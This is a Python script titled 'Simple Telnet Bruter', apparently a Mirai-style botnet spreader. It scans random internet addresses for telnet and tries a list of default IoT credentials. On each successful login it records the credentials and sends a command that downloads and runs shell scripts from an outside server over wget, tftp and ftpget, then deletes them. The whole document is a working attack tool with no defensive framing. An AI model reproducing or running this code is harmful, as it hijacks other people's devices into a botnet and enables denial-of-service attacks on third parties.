#!/usr/bin/python# Simple Telnet Bruter# Lots of false possitives but pulls

1. #!/usr/bin/python
2. # Simple Telnet Bruter
3. # Lots of false possitives but pulls alot of results extremely fast
4.  
5. import threading
6. import sys, os, re, time, socket
7. from sys import stdout
8.  
9. if len(sys.argv) < 3:
10. print "Usage: python "+sys.argv[0]+" <threads> <output file>"
11. sys.exit()
12.  
13. combo = [
14. "support:support",
15. "root:vizxv",
16. "root:xc3511",
17. "telnet:telnet",
18. "root:root",
19. "supervisor:zyad1234",
20. "root:",
21. "admin:1234",
22. "user:user",
23. "root:antslq",
24. "admin:admin",
25. "root:5up"
26. ]
27.  
28. threads = int(sys.argv[1])
29. output_file = sys.argv[2]
30.  
31. class router(threading.Thread):
32. def __init__ (self, ip):
33. threading.Thread.__init__(self)
34. self.ip = str(ip).rstrip('\n')
35. def run(self):
36. username = ""
37. password = ""
38. for passwd in combo:
39. if ":n/a" in passwd:
40. password=""
41. else:
42. password=passwd.split(":")[1]
43. if "n/a:" in passwd:
44. username=""
45. else:
46. username=passwd.split(":")[0]
47. try:
48. tn = socket.socket()
49. tn.settimeout(8)
50. tn.connect((self.ip,23))
51. except Exception:
52. tn.close()
53. break
54. try:
55. hoho = ''
56. hoho += readUntil(tn, "ogin:")
57. if "ogin" in hoho:
58. tn.send(username + "\n")
59. time.sleep(0.09)
60. except Exception:
61. tn.close()
62. try:
63. hoho = ''
64. hoho += readUntil(tn, "assword:")
65. if "assword" in hoho:
66. tn.send(password + "\n")
67. time.sleep(0.8)
68. else:
69. pass
70. except Exception:
71. tn.close()
72. try:
73. prompt = ''
74. prompt += tn.recv(40960)
75. if ">" in prompt and "ONT" not in prompt:
76. success = True
77. elif "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt:
78. success = True
79. else:
80. tn.close()
81. if success == True:
82. try:
83. os.system("echo "+self.ip+":23 "+username+":"+password+" >> "+output_file+"") # 1.1.1.1:23 user:pass # mirai
84. tn.send("cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://159.89.225.37/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 159.89.225.37 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 159.89.225.37; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 159.89.225.37 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *\n")
85. print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)
86. tn.close()
87. break
88. except:
89. tn.close()
90. else:
91. tn.close()
92. except Exception:
93. tn.close()
94.  
95. def readUntil(tn, string, timeout=8):
96. buf = ''
97. start_time = time.time()
98. while time.time() - start_time < timeout:
99. buf += tn.recv(1024)
100. time.sleep(0.01)
101. if string in buf: return buf
102. raise Exception('TIMEOUT!')
103.  
104. def Gen_IP():
105. not_valid = [10,127,169,172,192]
106. first = random.randrange(1,256)
107. while first in not_valid:
108. first = random.randrange(1,256)
109. ip = ".".join([str(first),str(random.randrange(1,256)),
110. str(random.randrange(1,256)),str(random.randrange(1,256))])
111. return ip
112.  
113. def HaxThread():
114. while 1:
115. try:
116. s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
117. s.settimeout(370)
118. IP = Gen_IP()
119. s.connect((IP, 23))
120. s.close()
121. print "\033[32m[\033[31m+\033[32m] FOUND " + IP
122. thread = router(IP)
123. thread.start()
124. except:
125. pass
126.  
127. if __name__ == "__main__":
128. threadcount = 0
129. for i in xrange(0,threads):
130. try:
131. threading.Thread(target=HaxThread, args=()).start()
132. threadcount += 1
133. except:
134. pass
135. print "[*] Started " + str(threadcount) + " scanner threads!"